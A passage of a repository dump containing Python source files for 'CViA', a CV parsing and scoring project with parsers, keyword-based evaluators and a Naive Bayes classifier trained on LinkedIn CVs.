"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass SkillEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"skill\"\n\n def evaluate(self, req, cv):\n req_skill = req[self.name]\n cv_skill = cv[self.name]\n if req_skill == [] or cv_skill == []:\n return 0\n skill_score = 0\n for pri in req_skill:\n skill_list = req_skill[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n #print \"==============\"\n #print skill_list\n #print cv_skill\n for s in skill_list:\n if s.lower() in (skill.lower() for skill in cv_skill):\n skill_score += base_score\n #print \"++++++ \"+s+\" \"+str(base_score)\n #self.score = skill_score\n return skill_score"
},
{
"alpha_fraction": 0.5270270109176636,
"alphanum_fraction": 0.5270270109176636,
"avg_line_length": 14,
"blob_id": "b77c49e1ed673f7036f2f665e13985dbc297080f",
"content_id": "5ce136a2402fefa0524a7ee142159a0e5b4ad755",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 5,
"path": "/CVFields/Field.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nclass Field:\n def __init__(self):\n pass"
},
{
"alpha_fraction": 0.6520146727561951,
"alphanum_fraction": 0.6520146727561951,
"avg_line_length": 23.81818199157715,
"blob_id": "c82941fb8f54f3f88f38cb32e4d63c96c3ad20d7",
"content_id": "af262936601c488545e054e9147eceba9ba606d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/CVFields/CertificationField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from CVFields.Field import Field\n\n__author__ = 'haojiang'\n\nclass CertificationField(Field):\n\n def __init__(self,title, issuedcompany, license, date):\n self.title = title\n self.company = issuedcompany\n self.license = license\n self.date = date\n"
},
{
"alpha_fraction": 0.5511073470115662,
"alphanum_fraction": 0.5613287687301636,
"avg_line_length": 31.63888931274414,
"blob_id": "10b4f37d59b817c2bd7257a802724d2793547374",
"content_id": "fb8d41ba9ea49ca17316f3c898ea1a9212448147",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1174,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 36,
"path": "/cvParser/EduParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import EducationField\n__author__ = 'haojiang'\n\n\n\nclass EduParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseEdu(self,text):\n textList = text.splitlines()\n indexarr = []\n result = []\n for i in range(0,len(textList)):\n if self.iskeysentence(textList[i]):\n indexarr.append(i)\n for i in range(0,len(indexarr)):\n theindex = indexarr[i]\n university = textList[theindex-1].strip()\n degree = textList[theindex].split(\",\")[0].strip()\n major = textList[theindex].split(\",\")[1].strip()\n result.append(self.factory.produce(\"edu\",university,degree,major))\n return result\n\n # To check whether is the \"degree,major,date\" or not\n def iskeysentence(self,str):\n result = False\n target = str.split(\",\")\n if len(target) == 3:\n if len(target[2].split())==3:\n advTarget = target[2].split()\n if advTarget[1] == '-' and advTarget[0].isdigit() and advTarget[2].isdigit():\n result = True\n return result"
},
{
"alpha_fraction": 0.672340452671051,
"alphanum_fraction": 0.672340452671051,
"avg_line_length": 22.600000381469727,
"blob_id": "2e47dd807109d558f18d7198279f86ac1cbbc038",
"content_id": "cc4b8dc89791542ac46bedac327141e9edc64cf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 10,
"path": "/CVFields/VolunteerField.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'haojiang'\n\nfrom CVFields.Field import Field\n\nclass VolunteerExpField(Field):\n\n def __init__(self,title,period,description):\n self.title = title\n self.period = period\n self.description = description"
},
{
"alpha_fraction": 0.686274528503418,
"alphanum_fraction": 0.686274528503418,
"avg_line_length": 20.85714340209961,
"blob_id": "5fba6993467e5cef0db31c25332d2b97806b51b1",
"content_id": "61166ebe1f935652ef3c07f0b3c4e3ffc8c0d602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 14,
"path": "/cvParser/SkillParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\nfrom CVFields import Skill_ExpertiseField\n__author__ = 'haojiang'\n\n\n\nclass SkillParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseSkill(self,text):\n textList = text.splitlines()\n return self.factory.produce(\"skill\",textList)\n"
},
{
"alpha_fraction": 0.48511165380477905,
"alphanum_fraction": 0.4888337552547455,
"avg_line_length": 27.821428298950195,
"blob_id": "752494236faa2ed12d13213e533b2b54b0fd6125",
"content_id": "87dfabb97417df82d31e8501ce4a01920a6f52be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 28,
"path": "/cvEvaluator/ExpEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass ExpEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"experience\"\n\n def evaluate(self, req, cv):\n req_exp = req[self.name]\n cv_exp = cv[self.name]\n exp_score = 0\n if req_exp == [] or cv_exp == []:\n return exp_score\n for pri in req_exp:\n req_exp_list = req_exp[pri]\n if pri == 'must':\n base_score = 5\n else:\n base_score = 2\n for exp in cv_exp:\n for s in req_exp_list:\n if s.lower() in exp['title'].lower():\n exp_score += base_score\n #self.score = exp_score\n return exp_score"
},
{
"alpha_fraction": 0.47622883319854736,
"alphanum_fraction": 0.4810636639595032,
"avg_line_length": 32.56756591796875,
"blob_id": "1f1f871be0705557623b6602db258cd529a8bce0",
"content_id": "5aa1df6554c3ad7fe8ea3c32ae9bc5aeb510e3c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 37,
"path": "/cvEvaluator/OtherEvaluator.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvEvaluator.BaseEvaluator import BaseEvaluator\n\n__author__ = 'siwei'\n\nclass OtherEvaluator(BaseEvaluator):\n\n def __init__(self):\n BaseEvaluator.__init__(self)\n self.name = \"other\"\n\n def evaluate(self, req, cv):\n req_other = req[self.name]\n if req_other == [] or cv == []:\n return 0\n other_score = 0\n base_score = 2\n for s in req_other:\n s = s.lower()\n if len(cv['interest']) > 0:\n if s in (i.lower() for i in cv['interest']):\n other_score += base_score\n if len(cv['project']) > 0:\n for proj in cv['project']:\n if s in proj['title'].lower():\n other_score += base_score\n\n if len(cv['project']) > 0:\n for proj in cv['project']:\n if s.lower() in proj['title'].lower() or s.lower() in proj['description'].lower():\n other_score += base_score\n\n # if s in cvOther['publications'].lower():\n # other_score += base_score\n if s in cv['summary'].lower():\n other_score += base_score\n #self.score = other_score\n return other_score"
},
{
"alpha_fraction": 0.6365614533424377,
"alphanum_fraction": 0.645266592502594,
"avg_line_length": 25.285715103149414,
"blob_id": "227e9b56fc3fd9c765bef279ef8ea5731f2a18ec",
"content_id": "96e4f76c75582f9f97d6e98ec87b570a191b7cf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 35,
"path": "/train_classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from cvClassifier.Classifier import Classifier\nfrom cvConverter import Converter\nfrom cvParser.Parser import Parser\nimport pprint\nimport os\n\n__author__ = 'siwei'\n\nroot_dir_path = os.path.dirname(os.path.abspath(__file__))\n\ncvs = [(\"cv/LinkedIn/YaminiBhaskar.pdf\",\"2\"),\n (\"cv/LinkedIn/DonnabelleEmbodo.pdf\",\"3\"),\n (\"cv/LinkedIn/PraveenDeorani.pdf\",\"4\"),\n (\"cv/LinkedIn/RussellOng.pdf\",\"5\"),\n (\"cv/LinkedIn/YaminiBhaskar.pdf\",\"6\")]\n\ntrain_data = []\n\ndef train():\n print \"Converting CV files ...\"\n converter = Converter.DocConverter()\n parser = Parser()\n print \"Parsing CVs...\"\n for cv in cvs:\n CV_Text = converter.documentToText(root_dir_path+\"/\"+cv[0])\n cvobj = parser.convertToObj(CV_Text)\n train_data.append((cvobj, cv[1]))\n\n\n pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(train_data)\n\n cl = Classifier()\n cl.train(train_data)\n cl.save()"
},
{
"alpha_fraction": 0.5390946269035339,
"alphanum_fraction": 0.5390946269035339,
"avg_line_length": 19.33333396911621,
"blob_id": "994ba6c0e32aa8d5fa6402dbe2538e2537a959c1",
"content_id": "de293cbd6979c2aaa28d22ed386bda3e42211413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 12,
"path": "/cvConverter/BaseConverter.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "__author__ = 'siwei'\n\nclass BaseConverter:\n def __init__(self):\n self.type = \"-\"\n\n def set_path(self, file_name):\n self.path = file_name\n self.text = file_name + \"\\n\"\n\n def get_type(self):\n return self.type"
},
{
"alpha_fraction": 0.47475457191467285,
"alphanum_fraction": 0.4803646504878998,
"avg_line_length": 37.56756591796875,
"blob_id": "db1a7d1276a41ceab98aa177a60e14fbf751c67f",
"content_id": "8ac334ef6d0a1089a76b8a4714e1a4fe37a2b57c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1426,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 37,
"path": "/cvParser/CertificationsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\nclass Certifications:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseCertifications(self,text):\n monthlist = [\"January\",\"February\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\"\n ,\"September\",\"October\",\"November\",\"December\"]\n textList = text.splitlines()\n result = []\n for i in range(0,len(textList),2):\n # print textList[i+1].split()\n title = textList[i]\n company = \"\"\n license = \"\"\n date = \"\"\n nextline = textList[i+1].split()\n if len(nextline) > 2:\n companyIndex = len(nextline)\n licenseIndex = len(nextline)\n for k in range(0,len(nextline)):\n if nextline[k] == \"License\":\n companyIndex = k - 1\n if nextline[k] in monthlist:\n licenseIndex = k - 1\n if k < companyIndex:\n company = company + \" \" + nextline[k]\n elif k > licenseIndex:\n date = date + \" \" + nextline[k]\n else:\n license = license + \" \" + nextline[k]\n\n result.append(self.factory.produce(\"certifications\",title.strip(),company.strip(),license.strip(),date.strip()))\n return result"
},
{
"alpha_fraction": 0.5758183002471924,
"alphanum_fraction": 0.5791583061218262,
"avg_line_length": 32.28888702392578,
"blob_id": "e252a930ed08742c3a1e598bb400d56f2b923703",
"content_id": "e417f6df91e91a1758f17f4106b5478865d0b54e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1497,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 45,
"path": "/cvClassifier/Classifier.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "from textblob.classifiers import NaiveBayesClassifier\nfrom nltk.corpus import stopwords\nimport pickle\nimport os\n# download nltk corpus: python -m textblob.download_corpora\n\n__author__ = 'siwei'\n\nclass Classifier:\n def __init__(self):\n self.cachedStopWords = stopwords.words(\"english\")\n self.path = os.path.dirname(os.path.abspath(__file__))\n\n def train(self, train_set):\n train_data = []\n for t in train_set:\n train_data.append((self._cvobj_to_string(t[0]),t[1]))\n print \"Training model...\"\n #print train_data\n self.cl = NaiveBayesClassifier(train_data)\n #print self._cvobj_to_string(train_set[0][0])\n\n def _cvobj_to_string(self, cv):\n str = \"\"\n for exp in cv['experience']:\n str += (exp['description']+\" \")\n for proj in cv['project']:\n str += (proj['title']+\" \")\n str += (proj['description']+\" \")\n for skill in cv['skill']:\n str += (skill+\" \")\n str = str.decode(\"utf-8\", \"replace\")\n str = ' '.join([word for word in str.split() if word not in self.cachedStopWords])\n return str\n\n def classify(self, cv):\n return self.cl.classify(self._cvobj_to_string(cv))\n\n def save(self):\n pickle.dump( self.cl, open( self.path+\"/cv_model.cvm\", \"wb\" ) )\n print \"CV classifier saved.\"\n\n def load(self):\n self.cl = pickle.load( open( self.path+\"/cv_model.cvm\", \"rb\" ) )\n print \"CV classifier loaded.\""
},
{
"alpha_fraction": 0.6201117038726807,
"alphanum_fraction": 0.6229050159454346,
"avg_line_length": 22.866666793823242,
"blob_id": "c6085894c467450dc8e2fdf49b1e90d457f4840f",
"content_id": "225189bfbdb18abc2b71fa83d5c1980abbbba8a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/cvParser/InterestsParser.py",
"repo_name": "yjlo123/CViA",
"src_encoding": "UTF-8",
"text": "import FieldFactory\n__author__ = 'haojiang'\n\n\n\nclass InterestParser:\n\n def __init__(self):\n self.factory = FieldFactory.FieldFacory()\n\n def ParseInterest(self,text):\n textList = text.split(\",\")\n for i in range(0,len(textList)):\n textList[i] = textList[i].strip()\n return self.factory.produce(\"interest\",textList)\n"
}
] | 47 |
Reemr/movie-genre-recognition
|
https://github.com/Reemr/movie-genre-recognition
|
e5c920b774e09424e12194de592308b6c583e7a0
|
2e50db0b0d87159f8e9328c85fbab2409339ed64
|
1cb75f858d09b8b406542566b40264ce9dcd80f3
|
refs/heads/master
| 2020-06-26T17:24:24.558769 | 2019-09-17T20:15:07 | 2019-09-17T20:15:07 | 199,698,624 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6174028515815735,
"alphanum_fraction": 0.6512786746025085,
"avg_line_length": 25.412281036376953,
"blob_id": "883fb74582b7d7fb6dc6c0b0e6a96ef686bd67be",
"content_id": "4d914d6b50124658baad29b4e8c76df7ee909f9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3011,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 114,
"path": "/models.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nfrom keras import layers\nfrom keras import models\nfrom keras import engine\nfrom keras.layers import Input, Conv2D, MaxPooling2D, BatchNormalization, Dense\nfrom keras.layers import Dropout, Flatten, GRU\nfrom keras.models import Model\nfrom keras.layers.merge import Average, Maximum, Add\nfrom keras.applications.resnet50 import ResNet50\n\nCLASSES = 5\nIMG_SIZE = (216,216,3)\nSEQ = 10\nBATCH_SIZE = 28\n\n'''\ndef RNN(in_shape), weights_dir):\n\n input_img = Input(shape=in_shape)\n\n x = GRU(128)(input_img)\n x = Dropout(0.9)(x)\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=input_img, outputs=x)\n\n\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir)\n\n\n return model\n'''\n\ndef finetuned_resnet(include_top, weights_dir):\n\n base_model = ResNet50(include_top=False, weights='imagenet', input_shape=IMG_SIZE)\n for layer in base_model.layers:\n layer.trainable = False\n\n x = base_model.output\n x = Flatten()(x)\n x = Dense(2048, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='relu')(x)\n x = Dropout(0.5)(x)\n\n if include_top:\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir, by_name=True)\n\n return model\n\ndef CNN(in_shape, weights_dir):\n #in_shape = (IMG_SIZE[0],IMG_SIZE[1],3)\n\n input_img = Input(shape=in_shape)\n\n x = Conv2D(96,(7,7), strides=(2,2), padding='same', activation='relu')(input_img)\n x = layers.BatchNormalization()(x)\n x = MaxPooling2D((2,2))(x)\n\n x = Conv2D(256,(5,5), strides=(2,2), padding='same', activation='relu')(x)\n x = BatchNormalization()(x)\n x = MaxPooling2D((2,2))(x)\n\n x = Conv2D(512,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n\n x = Conv2D(512,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n\n x = Conv2D(256,(3,3), strides=(1,1), padding='same', activation='relu')(x)\n x = MaxPooling2D((2,2))(x)\n\n x = layers.Flatten()(x)\n\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.2)(x)\n\n x = Dense(2048, activation='relu')(x)\n x = Dropout(0.2)(x)\n\n x = Dense(CLASSES, activation='softmax')(x)\n\n model = Model(inputs=input_img, outputs=x)\n\n if os.path.exists(weights_dir):\n model.load_weights(weights_dir)\n\n return model\n\ndef two_stream_model(spatial_weights, temporal_weights):\n\n spatial_stream = finetuned_resnet(include_top=True, weights_dir=spatial_weights)\n\n temporal_stream = CNN(input_shape, temporal_weights)\n\n spatial_output = spatial_stream.output\n temporal_output = temporal_stream.output\n\n fused_output = Average(name='fusion_layer')([spatial_output, temporal_output])\n\n model = Model(inputs=[spatial_stream.input, temporal_stream.input],\n outputs=fused_output, name=two_stream)\n\n return model\n\nif __name__ == '__main__':\n\n sha = (IMG_SIZE[0],IMG_SIZE[1])\n m = CNN(sha)\n print(m.summary())\n"
},
{
"alpha_fraction": 0.6036414504051208,
"alphanum_fraction": 0.6111111044883728,
"avg_line_length": 28.75,
"blob_id": "48278676abd9515bb625d8db3f68e17edc0ffece",
"content_id": "0f98ca755b3be0a088c42402a6631edda0bc0988",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2142,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 72,
"path": "/videoPreprocessing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport cv2\nimport numpy as np\nimport time\nimport shutil\nimport scipy.misc\n\n\ndef extract_frames(src, dst):\n cap = cv2.VideoCapture(src)\n\n while cap.isOpened():\n frame_pos = cap.get(1) #the value 1 gets the frame pos\n succ, frame = cap.read()\n if not succ:\n break\n if frame.any():\n frame_res = cv2.resize(frame, (216,216))\n np.save(dst+'_%d'%frame_pos, frame_res)\n\n cap.release()\n\ndef get_list_videos(list_dir,txt):\n txt_path = os.path.join(list_dir, txt)\n\n with open(txt_path) as files:\n datalist = [file for file in files]\n\n return datalist\n\ndef process_videos(list_dir, movie_dir, dest_dir, txt, train_test_dir):\n\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n\n\n datalist = get_list_videos(list_dir, txt)\n\n sub_dir = os.path.join(dest_dir, train_test_dir)\n\n if not os.path.exists(sub_dir):\n os.mkdir(sub_dir)\n\n start_time = time.time()\n print(\"Extracting frames...\")\n for i, clip in enumerate(datalist):\n clip_name = os.path.basename(clip)\n clip_categ = os.path.dirname(clip)\n categ_dir = os.path.join(sub_dir, clip_categ)\n src = os.path.join(movie_dir, clip)\n dst = os.path.join(categ_dir, os.path.splitext(clip_name)[0])\n if not os.path.exists(categ_dir):\n os.mkdir(categ_dir)\n video_time = time.time()\n extract_frames(src, dst)\n vid_elap = time.time() -video_time\n print(\" video\", i, \"time\", vid_elap / 60, 'minutes')\n elapsed_time = time.time()-start_time\n print(\"Total processing time:\", (elapsed_time / 60), 'minutes')\n\nif __name__ == \"__main__\":\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n dest_dir = os.path.join(data_dir, 'Movie-dataset-preprocessed')\n train_txt = 'train.txt'\n train = 'train'\n test_txt = 'test.txt'\n test = 'test'\n\n #process_videos(list_dir, movie_dir, dest_dir, train_txt, train)\n #process_videos(list_dir, movie_dir, dest_dir, test_txt, test)\n"
},
{
"alpha_fraction": 0.6150712966918945,
"alphanum_fraction": 0.6320434212684631,
"avg_line_length": 39.91666793823242,
"blob_id": "26c858c3ecbbff3fe62e9b3a90acc3b25660b9d9",
"content_id": "6e8ace13aee7436a36b5975292b9de0cb003dc0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2946,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 72,
"path": "/training.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "import os\nimport keras.callbacks\nfrom generators import seq_generator, img_generator, get_data_list\nfrom models import finetuned_resnet, CNN\nfrom keras.optimizers import SGD\nfrom dataPreprocessing import regenerate_data\n\nCLASSES = 5\nBATCH_SIZE = 20\n\ndef fit_model(model, train_data, test_data, weights_dir, input_shape, optic=False):\n\n try:\n if optic:\n train_generator = seq_generator(train_data, BATCH_SIZE, input_shape, CLASSES)\n test_generator = seq_generator(test_data, BATCH_SIZE, input_shape, CLASSES)\n else:\n train_generator = img_generator(train_data, BATCH_SIZE, input_shape, CLASSES)\n test_generator = img_generator(test_data, BATCH_SIZE, input_shape, CLASSES)\n\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n print(model.summary())\n\n print('Start fitting model')\n\n while True:\n callbacks = [keras.callbacks.ModelCheckpoint(weights_dir, save_best_only=True, save_weights_only=True),\n keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10, verbose=1, mode='auto'),\n keras.callbacks.TensorBoard(log_dir='.\\\\logs\\\\try', histogram_freq=0, write_graph=True, write_images=True)]\n model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=test_generator,\n validation_steps=25,\n verbose=1,\n callbacks=callbacks\n )\n print('finished')\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n movie_dir = os.path.join(data_dir, 'Movie-dataset')\n regenerate_data(data_dir, list_dir, movie_dir)\n\n except KeyboardInterrupt:\n print(\"Training is intrrupted!\")\n\n\nif __name__ == '__main__':\n\n data_dir = os.path.join(os.getcwd(), 'data')\n list_dir = os.path.join(data_dir, 'videoTrainTestlist')\n weights_dir = os.getcwd()\n\n video_dir = os.path.join(data_dir, 'Movie-Preprocessed-OF')\n train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n input_shape = (10, 216, 216, 3)\n weights_dest = os.path.join(weights_dir, 'finetuned_resnet_RGB_65_2.h5')\n model = finetuned_resnet(include_top=True, weights_dir=weights_dest)\n fit_model(model, train_data, test_data, weights_dest, input_shape)\n\n '''\n video_dir = os.path.join(data_dir, 'OF_data')\n weights_dest = os.path.join(weights_dir, 'temporal_cnn_2.h5')\n train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n\n input_shape = (216, 216, 18)\n model = CNN(input_shape, weights_dest)\n fit_model(model, train_data, test_data, weights_dest, input_shape, optic=True)\n '''\n"
},
{
"alpha_fraction": 0.5826867818832397,
"alphanum_fraction": 0.5926908850669861,
"avg_line_length": 36.38676834106445,
"blob_id": "38249a2e751b85f32a71bbbee1187fbce3d7c9d0",
"content_id": "6a544c357ee2f610539e21125ce616995adab040",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14694,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 393,
"path": "/dataPreprocessing.py",
"repo_name": "Reemr/movie-genre-recognition",
"src_encoding": "UTF-8",
"text": "\nimport numpy as np\nimport scipy.misc\nimport os, cv2, random\nimport glob\nimport shutil\nimport time\nimport warnings\nfrom collections import OrderedDict\nimport concurrent.futures\n\n\ndef optical_flow_prep(src_dir, dest_dir, mean_sub=True, overwrite=False):\n train_dir = os.path.join(src_dir, 'train')\n test_dir = os.path.join(src_dir, 'test')\n\n # create dest directory\n if os.path.exists(dest_dir):\n if overwrite:\n shutil.rmtree(dest_dir)\n else:\n raise IOError(dest_dir + ' already exists')\n os.mkdir(dest_dir)\n print(dest_dir, 'created')\n\n # create directory for training data\n dest_train_dir = os.path.join(dest_dir, 'train')\n if os.path.exists(dest_train_dir):\n print(dest_train_dir, 'already exists')\n else:\n os.mkdir(dest_train_dir)\n print(dest_train_dir, 'created')\n\n # create directory for testing data\n dest_test_dir = os.path.join(dest_dir, 'test')\n if os.path.exists(dest_test_dir):\n print(dest_test_dir, 'already exists')\n else:\n os.mkdir(dest_test_dir)\n print(dest_test_dir, 'created')\n\n dir_mapping = OrderedDict(\n [(train_dir, dest_train_dir), (test_dir, dest_test_dir)]) #the mapping between source and dest\n\n print('Start computing optical flows ...')\n for dir, dest_dir in dir_mapping.items():\n print('Processing data in {}'.format(dir))\n for index, class_name in enumerate(os.listdir(dir)): # run through every class of video\n class_dir = os.path.join(dir, class_name)\n dest_class_dir = os.path.join(dest_dir, class_name)\n if not os.path.exists(dest_class_dir):\n os.mkdir(dest_class_dir)\n # print(dest_class_dir, 'created')\n for filename in os.listdir(class_dir): # process videos one by one\n file_dir = os.path.join(class_dir, filename)\n frames = np.load(file_dir)\n # note: store the final processed data with type of float16 to save storage\n processed_data = stack_optical_flow(frames, mean_sub).astype(np.float16)\n dest_file_dir = os.path.join(dest_class_dir, filename)\n np.save(dest_file_dir, processed_data)\n # print('No.{} class {} finished, data saved in {}'.format(index, class_name, dest_class_dir))\n print('Finish computing optical flows')\n\n\n\ndef stack_optical_flow(frames, mean_sub=False):\n if frames.dtype != np.float32:\n frames = frames.astype(np.float32)\n warnings.warn('Warning! The data type has been changed to np.float32 for graylevel conversion...')\n frame_shape = frames.shape[1:-1] # e.g. frames.shape is (10, 216, 216, 3)\n num_sequences = frames.shape[0]\n output_shape = frame_shape + (2 * (num_sequences - 1),) # stacked_optical_flow.shape is (216, 216, 18)\n flows = np.ndarray(shape=output_shape)\n\n for i in range(num_sequences - 1):\n prev_frame = frames[i]\n next_frame = frames[i + 1]\n prev_gray = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)\n next_gray = cv2.cvtColor(next_frame, cv2.COLOR_BGR2GRAY)\n flow = _calc_optical_flow(prev_gray, next_gray)\n flows[:, :, 2 * i:2 * i + 2] = flow\n\n if mean_sub:\n flows_x = flows[:, :, 0:2 * (num_sequences - 1):2]\n flows_y = flows[:, :, 1:2 * (num_sequences - 1):2]\n mean_x = np.mean(flows_x, axis=2)\n mean_y = np.mean(flows_y, axis=2)\n for i in range(2 * (num_sequences - 1)):\n flows[:, :, i] = flows[:, :, i] - mean_x if i % 2 == 0 else flows[:, :, i] - mean_y\n\n return flows\n\n\ndef _calc_optical_flow(prev, next_):\n flow = cv2.calcOpticalFlowFarneback(prev, next_, flow=None, pyr_scale=0.5, levels=3, winsize=15, iterations=3,\n poly_n=5, poly_sigma=1.2, flags=0)\n return flow\n\n\n\ndef combine_list_txt(list_dir):\n testlisttxt = 'testlist.txt'\n trainlisttxt = 'trainlist.txt'\n\n testlist = []\n txt_path = os.path.join(list_dir, testlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n testlist.append(line[:line.rfind(' ')])\n\n trainlist = []\n txt_path = os.path.join(list_dir, trainlisttxt)\n with open(txt_path) as fo:\n for line in fo:\n trainlist.append(line[:line.rfind(' ')])\n\n return trainlist, testlist\n\n\ndef process_frame(frame, img_size, x, y, mean=None, normalization=True, flip=True, random_crop=True):\n if not random_crop:\n frame = scipy.misc.imresize(frame, img_size)\n else:\n frame = frame[x:x+img_size[0], y:y+img_size[1], :]\n # flip horizontally\n if flip:\n frame = frame[:, ::-1, :]\n frame = frame.astype(dtype='float16')\n if mean is not None:\n frame -= mean\n if normalization:\n frame /= 255\n\n return frame\n\n\ndef process_clip(src_dir, dst_dir, seq_len, img_size, mean=None, normalization=True,\n horizontal_flip=True, random_crop=True, consistent=True, continuous_seq=False):\n all_frames = []\n cap = cv2.VideoCapture(src_dir)\n while cap.isOpened():\n succ, frame = cap.read()\n if not succ:\n break\n # append frame that is not all zeros\n if frame.any():\n all_frames.append(frame)\n # save all frames\n if seq_len is None:\n all_frames = np.stack(all_frames, axis=0)\n dst_dir = os.path.splitext(dst_dir)[0] + '.npy'\n np.save(dst_dir, all_frames)\n else:\n clip_length = len(all_frames)\n if clip_length <= 20:\n print(src_dir, ' has no enough frames')\n step_size = int(clip_length / (seq_len + 1))\n frame_sequence = []\n # select random first frame index for continuous sequence\n if continuous_seq:\n start_index = random.randrange(clip_length-seq_len)\n # choose whether to flip or not for all frames\n if not horizontal_flip:\n flip = False\n elif horizontal_flip and consistent:\n flip = random.randrange(2) == 1\n if not random_crop:\n x, y = None, None\n xy_set = False\n for i in range(seq_len):\n if continuous_seq:\n index = start_index + i\n else:\n index = i*step_size + random.randrange(step_size)\n frame = all_frames[index]\n # compute flip for each frame\n if horizontal_flip and not consistent:\n flip = random.randrange(2) == 1\n if random_crop and consistent and not xy_set:\n x = random.randrange(frame.shape[0]-img_size[0])\n y = random.randrange(frame.shape[1]-img_size[1])\n xy_set = True\n elif random_crop and not consistent:\n x = random.randrange(frame.shape[0]-img_size[0])\n y = random.randrange(frame.shape[1]-img_size[1])\n frame = process_frame(frame, img_size, x, y, mean=mean, 